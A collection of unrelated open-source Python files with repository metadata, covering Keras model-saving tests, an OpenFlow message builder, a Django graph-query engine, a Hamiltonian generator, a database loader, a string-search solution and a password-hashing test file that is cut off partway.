model.add(keras.layers.Dense(num_hidden, input_dim=input_dim))
model.add(keras.layers.Dense(num_classes))
x = np.random.random((batch_size, input_dim))
ref_y = model.predict(x)
model.save_weights(h5_path)
model = keras.models.Sequential()
model.add(keras.layers.Dense(num_hidden, input_dim=input_dim))
model.add(keras.layers.Dense(num_classes))
model.load_weights(h5_path)
y = model.predict(x)
self.assertAllClose(y, ref_y)
class TestWholeModelSaving(test.TestCase):
def test_sequential_model_saving(self):
if h5py is None:
return # Skip test if models cannot be saved.
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.RepeatVector(3))
model.add(keras.layers.TimeDistributed(keras.layers.Dense(3)))
model.compile(loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[keras.metrics.categorical_accuracy],
sample_weight_mode='temporal')
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
new_model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
out2 = new_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# test that new updates are the same with both models
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
model.train_on_batch(x, y)
new_model.train_on_batch(x, y)
out = model.predict(x)
out2 = new_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_sequential_model_saving_2(self):
if h5py is None:
return # Skip test if models cannot be saved.
with self.test_session():
# test with custom optimizer, loss
class CustomOp(keras.optimizers.RMSprop):
pass
def custom_loss(y_true, y_pred):
return keras.losses.mse(y_true, y_pred)
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss=custom_loss, optimizer=CustomOp(), metrics=['acc'])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(
fname,
custom_objects={'CustomOp': CustomOp,
'custom_loss': custom_loss})
os.close(fd)
os.remove(fname)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_functional_model_saving(self):
if h5py is None:
return # Skip test if models cannot be saved.
with self.test_session():
inputs = keras.layers.Input(shape=(3,))
x = keras.layers.Dense(2)(inputs)
output = keras.layers.Dense(3)(x)
model = keras.models.Model(inputs, output)
model.compile(loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[keras.metrics.categorical_accuracy])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_saving_without_compilation(self):
if h5py is None:
return # Skip test if models cannot be saved.
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
def test_saving_with_tf_optimizer(self):
if h5py is None:
return # Skip test if models cannot be saved.
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse',
optimizer=training_module.AdadeltaOptimizer(0.1),
metrics=['acc'])
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
def test_saving_right_after_compilation(self):
if h5py is None:
return # Skip test if models cannot be saved.
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
model.model._make_train_function()
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
def test_saving_lambda_numpy_array_arguments(self):
if h5py is None:
return # Skip test if models cannot be saved.
mean = np.random.random((4, 2, 3))
std = np.abs(np.random.random((4, 2, 3))) + 1e-5
inputs = keras.layers.Input(shape=(4, 2, 3))
output = keras.layers.Lambda(lambda image, mu, std: (image - mu) / std,
arguments={'mu': mean, 'std': std})(inputs)
model = keras.models.Model(inputs, output)
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
self.assertAllClose(mean, model.layers[1].arguments['mu'])
self.assertAllClose(std, model.layers[1].arguments['std'])
def test_saving_model_with_long_layer_names(self):
if h5py is None:
return # Skip test if models cannot be saved.
with self.test_session():
      # This layer name will make the `layer_names` HDF5 attribute blow
      # out of proportion. Note that it fits into the internal HDF5
      # attribute memory limit on its own, but because h5py converts
      # the list of layer names into a numpy array, which uses the same
      # amount of memory for every item, it increases the memory
      # requirements substantially.
x = keras.Input(shape=(2,), name='input_' + ('x' * (2**15)))
f = x
for i in range(4):
f = keras.layers.Dense(2, name='dense_%d' % (i,))(f)
model = keras.Model(inputs=[x], outputs=[f])
model.compile(loss='mse', optimizer='adam', metrics=['acc'])
x = np.random.random((1, 2))
y = np.random.random((1, 2))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
# Check that the HDF5 files contains chunked array
# of layer names.
with h5py.File(fname, 'r') as h5file:
num_names_arrays = len([attr for attr in h5file['model_weights'].attrs
if attr.startswith('layer_names')])
        # The chunking of the layer names array should have happened.
self.assertGreater(num_names_arrays, 0)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Cleanup
os.close(fd)
os.remove(fname)
def test_saving_model_with_long_weights_names(self):
if h5py is None:
return # Skip test if models cannot be saved.
with self.test_session():
x = keras.Input(shape=(2,), name='nested_model_input')
f = x
for i in range(4):
f = keras.layers.Dense(2, name='nested_model_dense_%d' % (i,))(f)
# This layer name will make the `weights_name`
# HDF5 attribute blow out of proportion.
f = keras.layers.Dense(2, name='nested_model_output' + ('x' * (2**15)))(f)
nested_model = keras.Model(inputs=[x], outputs=[f], name='nested_model')
x = keras.Input(shape=(2,), name='outer_model_input')
f = nested_model(x)
f = keras.layers.Dense(2, name='outer_model_output')(f)
model = keras.Model(inputs=[x], outputs=[f])
model.compile(loss='mse', optimizer='adam', metrics=['acc'])
x = np.random.random((1, 2))
y = np.random.random((1, 2))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
# Check that the HDF5 files contains chunked array
# of weight names.
with h5py.File(fname, 'r') as h5file:
num_weight_arrays = len(
[attr for attr in h5file['model_weights']['nested_model'].attrs
if attr.startswith('weight_names')])
        # The chunking of the weight names array should have happened.
self.assertGreater(num_weight_arrays, 0)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Cleanup
os.close(fd)
os.remove(fname)
if __name__ == '__main__':
test.main()
avg_line_length: 34.510823 | max_line_length: 80 | alphanum_fraction: 0.615341

hexsha: 4a18cecde3f358ddb42121c04e4f1fd488e78d13 | size: 604 | ext: py | lang: Python
path: openFlow/ofptSetAsync.py
repo: wsharif/thesis @ 96a9bd6c86ed027c3eeee231b2eae1c14394d728 | licenses: ["MIT"]
stars: null | issues: null | forks: null
from ofptHeader import ofptHeader
from random import randint
from struct import Struct
def ofptSetAsync():
packetInMask = Struct('! I').pack(randint(0, 7))
packetInMask2 = Struct('! I').pack(randint(0, 7))
packetStatusMask = Struct('! I').pack(randint(0, 7))
packetStatusMask2 = Struct('! I').pack(randint(0, 7))
flowRemovedMask = Struct('! I').pack(randint(0, 15))
flowRemovedMask2 = Struct('! I').pack(randint(0, 15))
payload = packetInMask + packetInMask2 + packetStatusMask + packetStatusMask2 + flowRemovedMask + flowRemovedMask2
header = ofptHeader(28, payload)
return header + payload
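
A hedged round-trip check of the message built above, assuming `ofptHeader` emits the standard 8-byte OpenFlow header (version, type, length, xid):

```python
from struct import unpack

msg = ofptSetAsync()
version, msg_type, length, xid = unpack('! B B H I', msg[:8])
print(msg_type)                  # expected 28: OFPT_SET_ASYNC in OpenFlow 1.3+
masks = unpack('! 6I', msg[8:])  # the six big-endian 32-bit mask fields
print(masks)
```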
avg_line_length: 35.529412 | max_line_length: 115 | alphanum_fraction: 0.730132

hexsha: 4a18cf1e489b3c79d11c94ead62e276737f2f542 | size: 11,883 | ext: py | lang: Python
path: curious/query.py
stars: ginkgobioworks/curious @ ee8a33a92640b95d477422d5d627c750920d976b, ["MIT"], count 10 (2016-12-18T20:19:39.000Z to 2020-09-05T02:49:38.000Z)
issues: ginkgobioworks/curious @ ee8a33a92640b95d477422d5d627c750920d976b, ["MIT"], count 5 (2017-05-19T22:38:20.000Z to 2018-04-04T15:16:07.000Z)
forks: benjiec/curious @ 4e92c763f57ce9a61bd1a4b18203f9bb9b7bdaf6, ["MIT"], count 3 (2015-08-12T03:01:50.000Z to 2019-03-18T13:31:47.000Z)
import time
from curious import model_registry
from curious.graph import traverse, mk_filter_function
from .parser import Parser
from .utils import report_time
class Query(object):
def __init__(self, query):
parser = Parser(query)
self.__query = query
self.__obj_query = parser.object_query
self.__steps = parser.steps
self.__validate()
@property
def query_string(self):
return self.__query
@staticmethod
def _validate(query):
"""
Validate a query. A query is an array whose elements are model
relationships or subqueries. This function checks each model relationship
to make sure the model and the relationship exist.
"""
for rel in query:
if 'orquery' in rel:
for q in rel['orquery']:
Query._validate(q)
elif 'subquery' in rel:
Query._validate(rel['subquery'])
else:
model = rel['model']
method = rel['method']
if method is None:
model_registry.get_manager(model).model_class
else:
model_registry.get_manager(model).getattr(method)
def __validate(self):
Query._validate([self.__obj_query]+self.__steps)
def __get_objects(self):
"""
Get initial objects from object query.
"""
model = self.__obj_query['model']
method = self.__obj_query['method']
filters = self.__obj_query['filters']
filter_f = mk_filter_function(filters)
if method is None:
cls = model_registry.get_manager(model).model_class
q = cls.objects.all()
q = filter_f(q)
return q
else:
f = model_registry.get_manager(model).getattr(method)
return f(filter_f)
@staticmethod
def _extend_result(obj_src, next_obj_src):
# build input hash of IDs
input_map = {}
for obj, src in obj_src:
if obj.pk not in input_map:
input_map[obj.pk] = []
input_map[obj.pk].append(src)
keep = []
for next_obj, next_src in next_obj_src:
if next_src in input_map:
for src in input_map[next_src]:
keep.append((next_obj, src))
return list(set(keep))
@staticmethod
@report_time
def _graph_step(obj_src, model, step_f, filters, tree=None):
"""
Traverse one step on the graph. Takes in and returns arrays of output,
input object tuples. The input objects in the tuples are from start of the
query, not start of this step.
"""
# check if type matches existing object type
if len(obj_src):
t = type(obj_src[0][0])
if hasattr(t, '_deferred') and t._deferred:
t = t.__base__
if t != model_registry.get_manager(model).model_class:
raise Exception('Type mismatch when executing query: expecting "%s", got "%s"' %
(model, type(obj_src[0][0])))
next_obj_src = traverse([obj for obj, src in obj_src], step_f, filters)
if tree is not None:
tree.extend((t[0].id, t[1]) for t in next_obj_src)
return Query._extend_result(obj_src, next_obj_src)
@staticmethod
def _recursive_rel(obj_src, step):
"""
Traverse a relationship recursively. Collected objects, either loop
terminating objects or loop continuing objects. Returns arrays of output,
input object tuples. The input objects in the tuples are from start of the
query, not start of this step.
"""
model = step['model']
method = step['method']
filters = step['filters']
collect = step['collect']
step_f = model_registry.get_manager(model).getattr(method)
collected = {}
tree = []
starting = True
if collect == 'search' and filters is None:
return obj_src
to_remove = []
if collect in ("all", "until", "search"):
# if traversal or search, then keep starting nodes if starting nodes pass filter
if filters in (None, {}, []):
for tup in obj_src:
collected[tup] = 1
else:
filter_f = mk_filter_function(filters)
if len(obj_src) > 0:
ids = [obj.id for obj, src in obj_src]
q = obj_src[0][0].__class__.objects.filter(id__in=ids)
q = filter_f(q)
matched_objs = {obj.pk: 1 for obj in q}
for tup in obj_src:
if tup[0].pk in matched_objs:
collected[tup] = 1
elif collect == 'until':
# cannot continue to search with this starting node
to_remove.append(tup)
if len(to_remove) > 0:
obj_src = [tup for tup in obj_src if tup not in to_remove]
visited = {}
while len(obj_src) > 0:
# prevent loops by removing previously encountered edges; because many
# edges can lead to the same object, preventing revisit of edges rather
# than objects avoids loops without missing out on an edge.
new_src = [tup for tup in obj_src if tup not in visited]
for tup in obj_src:
visited[tup] = 1
if len(new_src) == 0:
break
next_obj_src = Query._graph_step(new_src, model, step_f, filters, tree)
# print "from %s\nreach %s" % (new_src, next_obj_src)
if collect == 'terminal':
next_demux = Query._graph_step([(obj, obj.pk) for obj, src in obj_src], model, step_f, filters)
next_src = [t[1] for t in next_demux]
for tup in obj_src:
if tup[0].pk not in next_src:
if tup not in collected:
collected[tup] = 1
obj_src = next_obj_src
elif collect == 'search':
reachable = Query._graph_step(obj_src, model, step_f, None)
for tup in next_obj_src:
if tup not in collected:
collected[tup] = 1
obj_src = list(set(reachable)-set(next_obj_src))
elif collect == 'until':
for tup in next_obj_src:
if tup not in collected:
collected[tup] = 1
obj_src = next_obj_src
else: # traversal
reachable = Query._graph_step(obj_src, model, step_f, None)
for tup in next_obj_src:
if tup not in collected:
collected[tup] = 1
obj_src = reachable
return collected.keys(), tree
@staticmethod
def _rel_step(obj_src, step):
"""
Traverse a relationship, possibly recursively. Takes in and returns arrays
of output, input object tuples. The input objects in the tuples are from
start of the query, not start of this step.
"""
tree = None
if 'recursive' not in step or step['recursive'] is False:
model = step['model']
method = step['method']
filters = step['filters']
step_f = model_registry.get_manager(model).getattr(method)
obj_src = Query._graph_step(obj_src, model, step_f, filters)
else:
obj_src, tree = Query._recursive_rel(obj_src, step)
# print '%s: %d' % (step, len(obj_src))
return obj_src, tree
@staticmethod
def _filter_by_subquery(obj_src, step):
"""
Filters existing objects by the subquery.
"""
subquery = step['subquery']
having = step['having']
#print 'sub %s, having %s' % (subquery, having)
objects = [obj for obj, src in obj_src]
subquery_res, last_model = Query._query(objects, subquery)
#print 'res %s' % (subquery_res,)
# take only the last result from subquery; grammar should enforce this.
if len(subquery_res) > 0:
assert(len(subquery_res) == 1)
subquery_res = subquery_res[-1][0]
subq_res_map = {}
for sub_obj, sub_src in subquery_res:
if sub_src not in subq_res_map:
subq_res_map[sub_src] = []
subq_res_map[sub_src].append(sub_obj)
keep = []
for obj, src in obj_src:
result_from_subq = []
if obj.pk in subq_res_map:
result_from_subq = subq_res_map[obj.pk]
if len(result_from_subq) > 0: # subquery has result
# if no modifier to subquery, or said should have subquery results ('+' or '?')
if having is None or having in ('+', '?'):
keep.append((obj, src))
if len(result_from_subq) == 0: # no subquery result
# if said should not have subquery results ('-') or don't care ('?')
if having in ('-', '?'):
keep.append((obj, src))
if having == '?':
subquery_res.append((None, obj.pk))
return keep, subquery_res
@staticmethod
def _or(obj_src, step):
"""
Or results of multiple queries
"""
or_queries = step['orquery']
or_results = []
for query in or_queries:
objects = [obj for obj, src in obj_src]
res, m = Query._query(objects, query)
if len(res) > 0 and len(res[0][0]):
or_results.append((res, m))
models = list(set([r[1] for r in or_results]))
if len(models) > 1:
raise Exception("Different object types at end of OR query: %s" % (', '.join([str(x) for x in models]),))
next_obj_src = []
for res, m in or_results:
next_obj_src.extend(res[0][0])
return Query._extend_result(obj_src, next_obj_src)
@staticmethod
def _query(objects, query, demux_first=True):
"""
Executes a query. A query consists of one or more subqueries. Each subquery
is an array of model relationships. In most cases the outputs of a subquery
becomes the inputs to the next query.
Input objects should be an array of model instances. Returns an array of
subquery results. Each subquery result is an array of tuples. First member
of tuple is output object from query. Second member of tuple is the pk of
the input object that produced the output.
"""
res = []
more_results = True
last_non_sub_index = -1
last_tree = None
if demux_first is True:
obj_src = [(obj, obj.pk) for obj in objects]
else:
obj_src = [(obj, None) for obj in objects]
for step in query:
if ('join' in step and step['join'] is True) or\
('subquery' in step and (step['having'] is None or step['having'] == '?')):
if more_results:
res.append((obj_src, last_non_sub_index, last_tree))
last_non_sub_index = len(res)-1
more_results = False
obj_src = list(set([(obj, obj.pk) for obj, src in obj_src]))
if 'orquery' in step:
#print 'orquery %s' % step
obj_src = Query._or(obj_src, step)
#print 'completed orquery'
more_results = True
elif 'subquery' in step:
#print 'subquery %s' % step
obj_src, subquery_res = Query._filter_by_subquery(obj_src, step)
#print 'completed subquery'
if step['having'] is None or step['having'] == '?':
# add subquery result to results, even if there are no results from subquery
res.append((subquery_res, last_non_sub_index, last_tree))
# don't increase last_non_sub_index, so caller knows next query
# should still join with the last non sub query results.
more_results = False
else:
#print 'query: %s' % step
obj_src, last_tree = Query._rel_step(obj_src, step)
#print 'completed query'
more_results = True
if more_results:
res.append((obj_src, last_non_sub_index, last_tree))
# last model, can be None if left join and got no data
t = None
for obj, src in obj_src:
if obj is not None:
t = obj.__class__
if hasattr(t, '_deferred') and t._deferred:
t = t.__base__
break
return res, t
def __call__(self):
"""
Executes the current query. Returns array of tuples; first member of tuple
is output object from query, second member of tuple is the object from the
first step of the query that produced the output object. Also returns
current model at end of query, which may be different than model of the
last result if last result is a filter query.
"""
objects = list(self.__get_objects())
return Query._query(objects, self.__steps, demux_first=False)
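
A standalone illustration of the `_extend_result` join that the traversal above relies on; it mirrors the method rather than importing it, so it runs without a configured Django project (the `Obj` class and root labels are illustrative):

```python
def extend_result(obj_src, next_obj_src):
    # Same logic as Query._extend_result: re-key each newly reached object
    # back to the root input(s) whose pk produced it.
    input_map = {}
    for obj, src in obj_src:
        input_map.setdefault(obj.pk, []).append(src)
    return list({(next_obj, src)
                 for next_obj, next_src in next_obj_src
                 if next_src in input_map
                 for src in input_map[next_src]})

class Obj:
    def __init__(self, pk):
        self.pk = pk

a, b, c, d = Obj(1), Obj(2), Obj(3), Obj(4)
obj_src = [(a, 'root-a'), (b, 'root-b')]  # results so far, keyed to query roots
next_obj_src = [(c, 1), (d, 2)]           # one step later, keyed to a.pk / b.pk
assert set(extend_result(obj_src, next_obj_src)) == {(c, 'root-a'), (d, 'root-b')}
```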
avg_line_length: 30.864935 | max_line_length: 111 | alphanum_fraction: 0.629723

hexsha: 4a18cff823d4c94030df536ee5a995795359c31a | size: 1,886 | ext: py | lang: Python
path: src/python/zquantum/qaoa/problems/generators.py
repo: zapatacomputing/z-quantum-qaoa @ a13a99939ee41c760fdfb302e5f4944e087a09a7 | licenses: ["Apache-2.0"]
stars: 3 (2020-10-06T13:54:40.000Z to 2021-07-04T21:02:14.000Z) | issues: 34 (2020-04-30T02:52:31.000Z to 2022-03-30T19:19:14.000Z) | forks: 5 (2020-06-24T10:57:01.000Z to 2021-07-09T01:14:16.000Z)
from typing import Callable, Dict, List
import networkx as nx
import numpy as np
from openfermion import QubitOperator
from zquantum.core.graph import generate_graph_from_specs
def get_random_hamiltonians_for_problem(
graph_specs: Dict,
number_of_instances: int,
possible_number_of_qubits: List[int],
hamiltonian_generator: Callable[[nx.Graph], QubitOperator],
seed=None,
) -> List[QubitOperator]:
"""Generates Hamiltonians based on the input graph description for a range
of number of qubits and a set number of instances.
Args:
graph_specs: Specifications of the graph to generate. It should contain at
least an entry with key 'type_graph' (Note: 'num_nodes' key will be overwritten)
number_of_instances: The number of hamiltonians to generate
possible_number_of_qubits: A list containing the number of
qubits in the hamiltonian. If it contains more than one value, then a
random value from the list will be picked to generate each instance.
hamiltonian_generator: a function that will generate a Hamiltonian
for a given problem based on the input graph.
seed: seed for random number generator
Returns:
List of openfermion.QubitOperator object describing the
Hamiltonians
H = \\sum_{<i,j>} w_{i,j} * scaling * (Z_i Z_j - shifted * I).
"""
if seed is not None:
np.random.seed(seed)
if "type_graph" not in graph_specs.keys():
raise ValueError("graph_specs should contain type_graph field.")
hamiltonians = []
for _ in range(number_of_instances):
graph_specs["num_nodes"] = np.random.choice(possible_number_of_qubits)
graph = generate_graph_from_specs(graph_specs)
hamiltonian = hamiltonian_generator(graph)
hamiltonians.append(hamiltonian)
return hamiltonians
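
A hedged usage sketch. The `'type_graph'` value is a placeholder (valid values are defined by `zquantum.core.graph.generate_graph_from_specs`, not by this file), and `ising_generator` is a hypothetical generator:

```python
from openfermion import QubitOperator

def ising_generator(graph):
    # Builds sum_{<i,j>} Z_i Z_j over the edges of the given graph.
    op = QubitOperator()
    for i, j in graph.edges:
        op += QubitOperator(((i, 'Z'), (j, 'Z')))
    return op

hamiltonians = get_random_hamiltonians_for_problem(
    graph_specs={'type_graph': 'erdos_renyi'},  # placeholder spec value
    number_of_instances=2,
    possible_number_of_qubits=[4, 6],
    hamiltonian_generator=ising_generator,
    seed=42,
)
```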
avg_line_length: 40.12766 | max_line_length: 92 | alphanum_fraction: 0.712619

hexsha: 4a18d01ea6cd6818c1a98878ba6e84750e2c5f0f | size: 1,099 | ext: py | lang: Python
path: services/movies_admin/utils/sqlite_to_postgres/load_data.py
repo: svvladimir-ru/ugc_sprint_1 @ 7ae4f9094f34981057f6c80d38bd96df6c96d2db | licenses: ["MIT"]
stars: null | issues: null | forks: 1 (2021-09-30T09:49:40.000Z to 2021-09-30T09:49:40.000Z)
import os
import sqlite3
from pathlib import Path
import psycopg2
from psycopg2.extensions import connection as _connection
from utils.loader import SQLiteLoader
from utils.saver import PostgresSaver
def load_from_sqlite(connection: sqlite3.Connection, pg_conn: _connection):
"""Basic method for loading data from SQLite into Postgres."""
postgres_saver = PostgresSaver(pg_conn)
sqlite_loader = SQLiteLoader(connection)
postgres_saver.save_all_data(sqlite_loader.load_movies())
if __name__ == '__main__':
dsl = {
'dbname': os.environ.get('POSTGRES_NAME', 'movies'),
'user': os.environ.get('POSTGRES_USER', 'postgres'),
'host': os.environ.get('POSTGRES_HOST', 'localhost'),
'port': os.environ.get('POSTGRES_PORT', '5432'),
'password': os.environ.get('POSTGRES_PASSWORD', 'postgres'),
}
sqlite_path = Path(__file__).parent.joinpath('db.sqlite')
with sqlite3.connect(sqlite_path) as sqlite_conn, psycopg2.connect(**dsl) as pg_conn:
load_from_sqlite(sqlite_conn, pg_conn)
sqlite_conn.close()
pg_conn.close()
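# Usage note (added; an assumption rather than part of the original script):
# every connection parameter above falls back to a default, so a typical
# invocation only overrides what differs from localhost, e.g.
#   POSTGRES_HOST=db POSTGRES_PASSWORD=secret python load_data.py
# with 'db.sqlite' located next to this file.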
| 33.30303
| 89
| 0.719745
|
4a18d0f336d21256fb7c4e51ecd092c67467c038
| 297
|
py
|
Python
|
easy/28. Implement strStr().py
|
junyinglucn/leetcode
|
1fbd0962e4b7dc46b4ed4f0f86778cfedbda72e7
|
[
"MIT"
] | null | null | null |
easy/28. Implement strStr().py
|
junyinglucn/leetcode
|
1fbd0962e4b7dc46b4ed4f0f86778cfedbda72e7
|
[
"MIT"
] | null | null | null |
easy/28. Implement strStr().py
|
junyinglucn/leetcode
|
1fbd0962e4b7dc46b4ed4f0f86778cfedbda72e7
|
[
"MIT"
] | null | null | null |
class Solution:
def strStr(self, haystack: str, needle: str) -> int:
l = len(needle)
if l == 0:
return 0
i = 0
while i <= (len(haystack) - l):
if haystack[i:i + l] == needle:
return i
i += 1
return -1
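# Worked examples (added for illustration):
#   Solution().strStr("hello", "ll")   -> 2   (first occurrence at index 2)
#   Solution().strStr("aaaaa", "bba")  -> -1  (needle never occurs)
#   Solution().strStr("abc", "")       -> 0   (empty needle matches at 0)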
| 24.75
| 56
| 0.420875
|
4a18d10a58f0e03779cf33de960ad76e8c8fde7d
| 333
|
py
|
Python
|
rest_registration/api/views/__init__.py
|
gcbirzan/django-rest-registration
|
1a9da937c283d03d1fce1a68322a702e14692c79
|
[
"MIT"
] | 329
|
2018-05-09T13:10:37.000Z
|
2022-03-25T11:05:20.000Z
|
rest_registration/api/views/__init__.py
|
gcbirzan/django-rest-registration
|
1a9da937c283d03d1fce1a68322a702e14692c79
|
[
"MIT"
] | 167
|
2018-04-21T00:28:17.000Z
|
2022-03-30T09:24:52.000Z
|
rest_registration/api/views/__init__.py
|
gcbirzan/django-rest-registration
|
1a9da937c283d03d1fce1a68322a702e14692c79
|
[
"MIT"
] | 97
|
2018-05-09T14:17:59.000Z
|
2022-02-23T08:46:30.000Z
|
from .change_password import change_password # noqa
from .login import login, logout # noqa
from .profile import profile # noqa
from .register import register, verify_registration # noqa
from .register_email import register_email, verify_email # noqa
from .reset_password import reset_password, send_reset_password_link # noqa
| 47.571429
| 76
| 0.813814
|
4a18d31811e8bfbbb7f6e21c58fd09ed1536601f
| 6,253
|
py
|
Python
|
utils_test.py
|
ockibagusp/cek-password
|
f7f38c5bcd518913cfe9ce6b5fcf7359e7b9e559
|
[
"MIT"
] | null | null | null |
utils_test.py
|
ockibagusp/cek-password
|
f7f38c5bcd518913cfe9ce6b5fcf7359e7b9e559
|
[
"MIT"
] | null | null | null |
utils_test.py
|
ockibagusp/cek-password
|
f7f38c5bcd518913cfe9ce6b5fcf7359e7b9e559
|
[
"MIT"
] | null | null | null |
#!/bin/python
# -*- coding: utf-8 -*-
"""
Ocki Bagus Pratama © 2021
"""
import json
import unittest
from utils import check_password
from sys import version_info
class TestUtils(unittest.TestCase):
def test_random_password(self):
# Lists of normal case scenarios.
list_test = [
# ("Case", "Output auto")
("Test1", "%nln@rF3NZAz@B2p"), # auto: 16 character
("Test2", "A2zmuJ%Cyy0VxjPb2L"), # auto: 18 character
("Test3", "zQKPzcVuQu#3esuSYtCzrG40"), # auto: 24 character
# incorrect
("Test4", "Max. 128 character") # auto: >128 character
]
for (testcase, inout) in list_test:
if testcase == "Test1":
out = "%nln@rF3NZAz@B2p"
elif testcase == "Test2":
out = "A2zmuJ%Cyy0VxjPb2L"
elif testcase == "Test3":
out = "zQKPzcVuQu#3esuSYtCzrG40"
elif testcase == "Test4":
out = "Max. 128 character"
self.assertEqual(inout, out)
def test_replace_password(self):
# replace password: 'a' -> '@', 'B' -> '&'...
_replaces = '{"a": "@","B": "&","b": "&","C": "<","c": "<","D": "|)","K": "|<","k": "|<","S": "$","s": "$","X": "%","x": "%"," ": "."}'
data = json.loads(_replaces)
print(data)
# Lists of normal case scenarios.
list_test = [
# ("Case", "Output")
("Test1|ThisIsPassword1", "Thi$I$P@$$word1"),
("Test2|ThisIsDolphin2", "Thi$I$|)olphin2"),
("Test3|ThisIsCow3", "Thi$I$<ow3"),
("Test4|ThisIsSpider4", "Thi$I$$pider4"),
]
# incorrect
for (tc, inout) in list_test:
testcase = str.split(tc, "|")
s = testcase[1]
for key, replace in data.items():
s = s.replace(key, replace)
self.assertEqual(s, inout)
def test_hasher(self):
# Lists of normal case scenarios.
list_test = [
# ("Case|Hasher function", "Input|Output")
("Test1|md5", "ThisIsTest1|1fb81916b94ae73ddd71ac6fcf5a6e01"),
("Test2|sha1", "ThisIsTest2|55b3eeebf68f7a2895993d8a616b00654bf13217"),
("Test3|sha224", "ThisIsTest3|2856b277aee63cb9bc9a63ee66adf269c1efdfa5b7cd3b5f2fbb8afa"),
("Test4|sha256", "ThisIsTest4|f9964fc0c93157234071446069c72b0d571918f6d737f30054adc7ba516db380"),
("Test5|sha384", "ThisIsTest5|202bd0a7541a1e2309d45a26f8488fdef1c00dd6ffabd30bee6aba58fe06ef309e85df881c78e54c544302e24a229859"),
("Test6|sha512", "ThisIsTest6|12ae4fff4a0d152b26acf43872519220d2f32d61c9133616f4f2a2310556bbe4739eb558f3db36242208dcc62bef00b2c31b655f469b51c5775533a36f58be5e"),
("Test7|No", "|Ocki Bagus Pratama © 2020"),
# incorrect
("Test8|asfff", "|Wrong!")
]
# Python 3.6 or later
if version_info >= (3, 6):
list_test.append(("Test9|blake2b", "ThisIsTest7|68f750d29e6fb2492b9ded9ae7f2bfc2a24bbc3f2952a69856be4177ae11bd42d55a126eb3ed3a6f89eb05280f52f50b3cb71ae7064cdcc5cf41f624d15ec9a3"))
list_test.append(("Test10|blake2s", "ThisIsTest8|db81752111c5b1d8ea8c85f032984dffcdb756d5b6d51ac21a4592a2eea9bfeb"))
pas = check_password()
for (k, v) in list_test:
testcase = str.split(k, "|")
inout = str.split(v, "|")
pas.action(inout[0])
if testcase[1] == "md5":
out = pas.md5()
elif testcase[1] == "sha1":
out = pas.sha1()
elif testcase[1] == "sha224":
out = pas.sha224()
elif testcase[1] == "sha256":
out = pas.sha256()
elif testcase[1] == "sha384":
out = pas.sha384()
elif testcase[1] == "sha512":
out = pas.sha512()
elif testcase[1] == "blake2b":
out = pas.blake2b()
elif testcase[1] == "blake2s":
out = pas.blake2s()
elif testcase[1] == "No":
out = "Ocki Bagus Pratama © 2020"
elif testcase[1] == "asfff":
out = "Wrong!"
self.assertEqual(inout[1], out)
def test_hex(self):
# Lists of normal case scenarios.
list_test = [
# ("Case|Hasher function", "Output|10 digest")
("Test1|md5", "e1b849f9631ffc1829b2e31402373e3c|1402373e3c"),
("Test2|sha1", "2b84f621c0fd4ba8bd514c5c43ab9a897c8c014e|897c8c014e"),
("Test3|sha224", "5e10e8b7142ca791d7e2c94c6cdb5068a5b7b36513c684588763ca34|588763ca34"),
("Test4|sha256", "b9cca56a720f2beee61f2e744ab3d20a95772a4315d18c5eee251a465f078012|465f078012"),
("Test5|sha384", "4d5c1ff38f0c3882e91b31962285f803024e9cee8940aa9a1b5936d800058a59221fd31aa9c9d638fd14b28ccecaa78c|8ccecaa78c"),
("Test6|sha512", "9ad960eb301b9efd416686821761232e3acaaec24afa7e6e29913990f8e7090f9c74ca4d18a211632a81ac1d92116f26538e655152356972f137ab6229960998|6229960998"),
